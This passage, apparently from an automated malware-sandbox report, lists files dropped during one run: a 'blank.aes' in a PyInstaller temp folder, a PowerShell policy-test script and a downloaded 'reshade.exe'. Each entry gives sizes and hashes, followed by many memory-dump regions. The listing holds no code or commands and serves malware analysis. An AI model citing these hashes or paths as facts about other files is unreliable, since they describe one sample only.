                                                                                                                                                                                                                                                3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI54202\blank.aes
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                123KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                3d961d5ca953f16fbf598761dc4e6add

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                c4c337c48acd50e0a0de9cd182c1073e3d0584e6

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                3ea6cd90f21aa38ea851a92ca1195f8eebf7c90449c9c1c03a61c012e580c44c

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                c99c941591396c19758a7d8c9e4c2bdd059acfb8673e96dc1f4f0d4b5f86c7874161b2243bafa71824c1282553d8a410ba4dae616cec18b3bae85e08c9c0f9fe

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qy0rraks.bvc.ps1
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                60B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\reshade.exe
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                7.4MB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                1c1d27c7e15fd1e2be7e01f51dceed9b

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                a2480e056bcf6ad12be8728b5eab75ba19d2f9a8

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                5af95f22202d8bb1ebb29b2e15281c89f333d22ecbcc70a9048c46b09a02db7b

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                c761b4bbc2664b1b06b3901cdd41ae10e2e88cfd97e98a89c80189c06f69b2ed3b27b3e11d2966c06a5c556aca345b13926940bec1ca51c6cc360c1c17f3b303

                                                                                                                                                                                                                                              • \??\pipe\crashpad_4264_IVUSMSARRKKQJNCC
                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                              • memory/2880-143-0x00007FF95BC90000-0x00007FF95BCA4000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                              • memory/2880-86-0x00007FF95C300000-0x00007FF95C323000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                140KB

                                                                                                                                                                                                                                              • memory/2880-127-0x00007FF948A30000-0x00007FF948F50000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.1MB

                                                                                                                                                                                                                                              • memory/2880-142-0x00007FF95FBD0000-0x00007FF95FBDF000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                60KB

                                                                                                                                                                                                                                              • memory/2880-144-0x00007FF95BC80000-0x00007FF95BC8D000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                              • memory/2880-350-0x00007FF95C300000-0x00007FF95C323000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                140KB

                                                                                                                                                                                                                                              • memory/2880-141-0x00007FF95C300000-0x00007FF95C323000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                140KB

                                                                                                                                                                                                                                              • memory/2880-146-0x00007FF94C080000-0x00007FF94C19C000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                                              • memory/2880-349-0x00007FF948F50000-0x00007FF949539000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.9MB

                                                                                                                                                                                                                                              • memory/2880-128-0x00000242E1770000-0x00000242E1C90000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.1MB

                                                                                                                                                                                                                                              • memory/2880-126-0x00007FF94C1A0000-0x00007FF94C26D000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                820KB

                                                                                                                                                                                                                                              • memory/2880-121-0x00007FF95F100000-0x00007FF95F133000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                204KB

                                                                                                                                                                                                                                              • memory/2880-119-0x00007FF95F400000-0x00007FF95F40D000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                              • memory/2880-117-0x00007FF95FE90000-0x00007FF95FEA9000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                              • memory/2880-205-0x00007FF94C270000-0x00007FF94C3E7000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                                              • memory/2880-115-0x00007FF94C270000-0x00007FF94C3E7000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                                              • memory/2880-203-0x00007FF95F140000-0x00007FF95F163000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                140KB

                                                                                                                                                                                                                                              • memory/2880-113-0x00007FF95F140000-0x00007FF95F163000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                140KB

                                                                                                                                                                                                                                              • memory/2880-215-0x00007FF95FE90000-0x00007FF95FEA9000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                              • memory/2880-112-0x00007FF95FEB0000-0x00007FF95FEC9000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                              • memory/2880-109-0x00007FF95FED0000-0x00007FF95FEFD000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                180KB

                                                                                                                                                                                                                                              • memory/2880-219-0x00007FF95F100000-0x00007FF95F133000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                204KB

                                                                                                                                                                                                                                              • memory/2880-87-0x00007FF95FBD0000-0x00007FF95FBDF000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                60KB

                                                                                                                                                                                                                                              • memory/2880-125-0x00007FF948F50000-0x00007FF949539000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.9MB

                                                                                                                                                                                                                                              • memory/2880-80-0x00007FF948F50000-0x00007FF949539000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.9MB

                                                                                                                                                                                                                                              • memory/2880-450-0x00007FF948F50000-0x00007FF949539000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.9MB

                                                                                                                                                                                                                                              • memory/2880-461-0x00007FF948A30000-0x00007FF948F50000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.1MB

                                                                                                                                                                                                                                              • memory/2880-465-0x00007FF95F140000-0x00007FF95F163000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                140KB

                                                                                                                                                                                                                                              • memory/2880-466-0x00007FF95C300000-0x00007FF95C323000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                140KB

                                                                                                                                                                                                                                              • memory/2880-224-0x00000242E1770000-0x00000242E1C90000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.1MB

                                                                                                                                                                                                                                              • memory/2880-222-0x00007FF94C1A0000-0x00007FF94C26D000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                820KB

                                                                                                                                                                                                                                              • memory/2880-221-0x00007FF948A30000-0x00007FF948F50000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.1MB

                                                                                                                                                                                                                                              • memory/2880-467-0x00007FF95FBD0000-0x00007FF95FBDF000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                60KB

                                                                                                                                                                                                                                              • memory/2880-468-0x00007FF95FED0000-0x00007FF95FEFD000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                180KB

                                                                                                                                                                                                                                              • memory/2880-469-0x00007FF95FEB0000-0x00007FF95FEC9000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                              • memory/2880-470-0x00007FF94C270000-0x00007FF94C3E7000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                                              • memory/2880-471-0x00007FF95FE90000-0x00007FF95FEA9000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                              • memory/2880-472-0x00007FF95F400000-0x00007FF95F40D000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                              • memory/2880-474-0x00007FF95BC90000-0x00007FF95BCA4000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                              • memory/2880-475-0x00007FF95BC80000-0x00007FF95BC8D000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                              • memory/2880-476-0x00007FF94C080000-0x00007FF94C19C000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                                              • memory/2880-473-0x00007FF95F100000-0x00007FF95F133000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                204KB

                                                                                                                                                                                                                                              • memory/2880-460-0x00007FF94C1A0000-0x00007FF94C26D000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                820KB

                                                                                                                                                                                                                                              • memory/2880-436-0x00007FF95C300000-0x00007FF95C323000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                140KB

                                                                                                                                                                                                                                              • memory/2880-441-0x00007FF94C270000-0x00007FF94C3E7000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                                              • memory/2880-435-0x00007FF948F50000-0x00007FF949539000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.9MB

                                                                                                                                                                                                                                              • memory/3672-147-0x0000015D55610000-0x0000015D55632000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                136KB

                                                                                                                                                                                                                                              • memory/5208-341-0x00000225BE620000-0x00000225BE628000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                              • memory/5560-216-0x00007FF95BC50000-0x00007FF95BC7D000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                180KB

                                                                                                                                                                                                                                              • memory/5560-244-0x00007FF948510000-0x00007FF948A30000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.1MB

                                                                                                                                                                                                                                              • memory/5560-245-0x00007FF95B6A0000-0x00007FF95B6B4000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                              • memory/5560-246-0x00007FF95B220000-0x00007FF95B22D000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                              • memory/5560-247-0x00007FF951E00000-0x00007FF951E33000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                204KB

                                                                                                                                                                                                                                              • memory/5560-248-0x00007FF94BF00000-0x00007FF94C077000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                                              • memory/5560-249-0x00007FF95B9E0000-0x00007FF95B9EF000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                60KB

                                                                                                                                                                                                                                              • memory/5560-250-0x00007FF95B870000-0x00007FF95B889000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                              • memory/5560-251-0x00007FF95B230000-0x00007FF95B253000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                140KB

                                                                                                                                                                                                                                              • memory/5560-252-0x00007FF95BC50000-0x00007FF95BC7D000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                180KB

                                                                                                                                                                                                                                              • memory/5560-253-0x00007FF95AEA0000-0x00007FF95AEC3000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                140KB

                                                                                                                                                                                                                                              • memory/5560-254-0x00007FF95BC40000-0x00007FF95BC4D000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                              • memory/5560-256-0x00007FF93AF00000-0x00007FF93B4E9000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.9MB

                                                                                                                                                                                                                                              • memory/5560-255-0x00007FF95B6E0000-0x00007FF95B6F9000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                              • memory/5560-243-0x00007FF94BE30000-0x00007FF94BEFD000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                820KB

                                                                                                                                                                                                                                              • memory/5560-232-0x00007FF95B220000-0x00007FF95B22D000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                              • memory/5560-229-0x000002A1CD710000-0x000002A1CDC30000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.1MB

                                                                                                                                                                                                                                              • memory/5560-230-0x00007FF951E00000-0x00007FF951E33000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                204KB

                                                                                                                                                                                                                                              • memory/5560-231-0x00007FF95B6A0000-0x00007FF95B6B4000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                              • memory/5560-225-0x00007FF95BC40000-0x00007FF95BC4D000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                              • memory/5560-227-0x00007FF94BE30000-0x00007FF94BEFD000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                820KB

                                                                                                                                                                                                                                              • memory/5560-228-0x00007FF948510000-0x00007FF948A30000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.1MB

                                                                                                                                                                                                                                              • memory/5560-226-0x00007FF93AF00000-0x00007FF93B4E9000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.9MB

                                                                                                                                                                                                                                              • memory/5560-223-0x00007FF95B6E0000-0x00007FF95B6F9000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                              • memory/5560-217-0x00007FF95B870000-0x00007FF95B889000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                              • memory/5560-218-0x00007FF95AEA0000-0x00007FF95AEC3000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                140KB

                                                                                                                                                                                                                                              • memory/5560-220-0x00007FF94BF00000-0x00007FF94C077000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                                              • memory/5560-204-0x00007FF95B230000-0x00007FF95B253000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                140KB

                                                                                                                                                                                                                                              • memory/5560-206-0x00007FF95B9E0000-0x00007FF95B9EF000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                60KB

                                                                                                                                                                                                                                              • memory/5560-198-0x00007FF93AF00000-0x00007FF93B4E9000-memory.dmp
                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                5.9MB